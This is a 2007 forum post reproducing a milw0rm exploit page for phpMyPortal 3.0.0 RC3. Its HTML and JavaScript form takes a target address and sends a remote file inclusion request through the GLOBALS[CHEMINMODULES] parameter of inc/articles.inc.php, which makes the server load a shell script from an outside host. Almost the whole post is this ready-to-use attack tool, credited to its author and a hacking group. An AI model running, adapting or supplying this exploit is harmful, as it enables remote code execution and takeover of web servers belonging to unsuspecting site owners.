Ras Posted May 10, 2007 Report Posted May 10, 2007 <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1254"><title>phpMyPortal 3.0.0 RC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit</title><script language="JavaScript">//'===============================================================================================//'[Script Name: phpMyPortal (22 acc.s) (Version 3.0.0 RC3 du 05/05/2007)//'[Ex : [Path_Script]/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=Shell//'[Author : Mahmood_ali//'[S.Page : [url]http://phpmyportal.info/menu.php[/url] <= Click T.l.chargez phpMyPortal//'[$$ : Free//'===============================================================================================//'[[V.Code]]------------------------------------------------------//'//'require_once($GLOBALS['CHEMINMODULES'].'/forum/inc/nouvelle.inc.php');//'//'[[V.Code]]---------------------------------------------------------//# Tryag.Com//# ... //Basic exploit,but any time : ( var path="/inc/" var adres="/articles.inc.php?" //File name var acik ="GLOBALS[CHEMINMODULES]=" // Line 67 var shell="http://www.spy-art.com/xx.txt?" // Shell Tryag-Team function command(){ if (document.rfi.target1.value==""){ alert("Failed.."); return false; } rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready rfi.submit(); // Form Submit }</script></head><body bgcolor="#000000"><center>[b]<font face="Arial" size="2" color="#FFFFFF">phpMyPortal 3.0.0RC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit</font>[/b]</p></p><form method="post" target="getting" name="rfi" onSubmit="command();"> [b]<font face="Tahoma" size="1" color="#FF0000">Target:</font><font face="Tahoma" size="1" color="#FFFF00">[[url]http://[target]/[/url][scriptpath]</font><font color="#00FF00" size="2" face="Tahoma"> </font><font color="#FF0000" size="2"></font>[/b] <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p><input type="submit" value="Gonder" name="B1"><input type="reset" value="Sifirla" name="B2"></p></form><iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe></p>[b]<font face="Lucida Handwriting" size="5" color="#FF0000">Mahmood_ali</font>[/b][b]<a href="http://tryag.com/cc"><font face="Lucida Handwriting" size="5" color="#FFFFFF">Tryag.-Team</font></a>[/b]</p></p></center></body></html># milw0rm.com [2007-05-09] Quote